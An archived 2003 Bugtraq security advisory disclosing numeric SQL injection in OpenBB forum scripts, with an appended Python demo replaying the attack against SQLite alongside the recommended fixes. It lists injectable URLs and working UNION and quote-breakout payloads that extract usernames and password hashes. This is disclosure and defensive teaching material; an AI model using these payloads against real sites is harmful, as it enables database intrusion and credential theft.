99663 2003-04-25  18:07  /104 lines/ Albert Puigsech Galicia <ripe@7a69ezine.org>
Imported: 2003-04-25  18:07  by Brevbäraren
External recipient: bugtraq@securityfocus.com
External replies to: ripe@7a69ezine.org
Recipient: Bugtraq (import) <4644>
Subject: Multiple SQL injection on OpenBB forums
------------------------------------------------------------
/-----------------------------------------------------------------------------\
|                             7 A 6 9 - A d v                          C: 008
|-----------------------------------------------------------------------------|
|
|                     [ SQL injection on OpenBB forums ]
|
\-----------------------------------------------------------------------------/
                                                                | 22/04/2003 |
                                                                \------------/

Data.
-----

        + Type:         SQL injection

        + Software:     OpenBB.

        + Versions:     1.1.0 (current version).

        + Exploit:      Yes.

        + Author:       Albert Puigsech Galicia

        + Contact:      ripe@7a69ezine.org




Introduction.
-------------

        OpenBB is a complete forum written in PHP that uses a MySQL
database. More information about this software can be found on the
official OpenBB website: http://www.openbb.co.uk.


Description.
------------

        There are multiple SQL injection vulnerabilities in the current
version of OpenBB.

        Every PHP script that builds an SQL query from a numeric value
supplied by the web user allows us to inject our own SQL code into it.



Exploitation.
-------------

        As in other cases of SQL injection, it is possible to extract
information from the database. If the vulnerable host runs MySQL 3 we
must use the LIKE method(*), but if MySQL 4 is used we can use UNION,
which makes exploitation much easier.

        To exploit this vulnerability we only need to add a space (or
%20) after the number, followed by our own SQL.

        Some examples of this SQL injection in OpenBB follow. Each
example gives the URL that triggers it and the SQL query that is
executed (look at '<something>': that is where our own SQL code ends
up):


        http://vulnerable/index.php?CID=1 <something>

        SELECT guest, forumid, title, lastthread, lastposter, lastposterid,
        lastthreadid, lastpost, moderators, description, type, postcount,
        threadcount, forumkey FROM obb_forum_display WHERE
        parent = 3 <something> ORDER BY displayorder


        http://vulnerable/board.php?FID=2 <something>

        SELECT title, threadcount, type, hidden_topics, forumkey FROM
        obb_forum_display WHERE forumid = 2 <something>


        http://vulnerable/member.php?action=profile&UID=1 <something>

        SELECT * FROM obb_customvalues v INNER JOIN obb_custompermis p ON
        p.fieldid = v.fieldid INNER JOIN obb_customfields f on
        f.fieldid=v.fieldid WHERE v.userid=1 <something> AND
        p.canviewothers='t' AND p.groupid='0'



Patch.
------

        There is no patch yet, but the problem is solved if you put
quotes around every numeric variable included in an SQL query, or
check that the variable really is a number. Quoting on its own only
holds if the value cannot carry a quote of its own (that is, if it is
also escaped); rejecting anything that is not a decimal integer is the
simpler and safer of the two.
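
        The following is an added example, not code from OpenBB or from
this advisory. It replays the board.php injection described under
Exploitation against an in-memory SQLite database (standing in for
MySQL 4, where UNION is available) and puts the two fixes from the
Patch section side by side. The obb_forum_display column names come
from the advisory; the obb_user table, its columns, the row data and
the host name "vulnerable" are constructed for this demo.

```python
"""Added example, not OpenBB's code: numeric SQL injection from the
advisory replayed against SQLite, with the quoting fix and the
integer-check fix next to the vulnerable version."""
import re
import sqlite3
from urllib.parse import quote

# Query text from the advisory's board.php example, minus the user-supplied
# number that the script appends to the end.
FORUM_SQL = ("SELECT title, threadcount, type, hidden_topics, forumkey "
             "FROM obb_forum_display WHERE forumid = ")

# Attacker-controlled FID: a space after the number, then our own SQL.
# UNION must supply the same column count (five) as the original SELECT.
PAYLOAD = "2 UNION SELECT username, password, 0, 0, 0 FROM obb_user"

# Variant against quoting without escaping: close the string literal
# ourselves and comment out the closing quote the script appends.
QUOTE_BREAKOUT = "2' UNION SELECT username, password, 0, 0, 0 FROM obb_user --"


def build_db() -> sqlite3.Connection:
    """Constructed sample data; obb_user and its rows are assumptions."""
    con = sqlite3.connect(":memory:")
    con.executescript("""
        CREATE TABLE obb_forum_display (
            forumid INTEGER, title TEXT, threadcount INTEGER,
            type INTEGER, hidden_topics INTEGER, forumkey TEXT);
        INSERT INTO obb_forum_display VALUES (2, 'General', 10, 1, 0, 'gen');
        CREATE TABLE obb_user (userid INTEGER, username TEXT, password TEXT);
        INSERT INTO obb_user VALUES (1, 'admin', '5f4dcc3b5aa765d61d8327deb882cf99');
    """)
    return con


def exploit_url(host: str, fid: str) -> str:
    """The URL form from the advisory: the space after the number becomes %20."""
    return f"http://{host}/board.php?FID={quote(fid, safe='')}"


def vulnerable_board(con: sqlite3.Connection, fid: str) -> list:
    """Mirrors board.php: FID is pasted into the query unquoted and unchecked."""
    return con.execute(FORUM_SQL + fid).fetchall()


def quoted_only_board(con: sqlite3.Connection, fid: str) -> list:
    """First fix from the Patch section, quotes around the number, but with
    no escaping. Stops PAYLOAD, not a value that carries its own quote."""
    return con.execute(FORUM_SQL + "'" + fid + "'").fetchall()


def hardened_board(con: sqlite3.Connection, fid: str) -> list:
    """Second fix: insist the value really is a number, then bind it."""
    if not re.fullmatch(r"[0-9]+", fid):
        raise ValueError("FID must be a decimal integer")
    return con.execute(FORUM_SQL + "?", (int(fid),)).fetchall()


if __name__ == "__main__":
    db = build_db()
    print(exploit_url("vulnerable", PAYLOAD))
    print("vulnerable:   ", vulnerable_board(db, PAYLOAD))
    print("quoted only:  ", quoted_only_board(db, PAYLOAD))
    print("quote breakout", quoted_only_board(db, QUOTE_BREAKOUT))
    try:
        hardened_board(db, PAYLOAD)
    except ValueError as err:
        print("hardened:      rejected:", err)
    print("hardened, FID=2", hardened_board(db, "2"))
```

        With the plain payload the vulnerable query returns the forum
row followed by a row holding the admin username and password hash;
the quoted version returns no user rows for that payload but leaks the
same row once the input closes the quote itself, and the integer check
refuses both payloads before any SQL runs.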


--
>====================================
> Albert Puigsech Galicia (7a69)
>
> http://ripe.7a69ezine.org
>====================================
(99663) /Albert Puigsech Galicia <ripe@7a69ezine.org>/(Reflowed)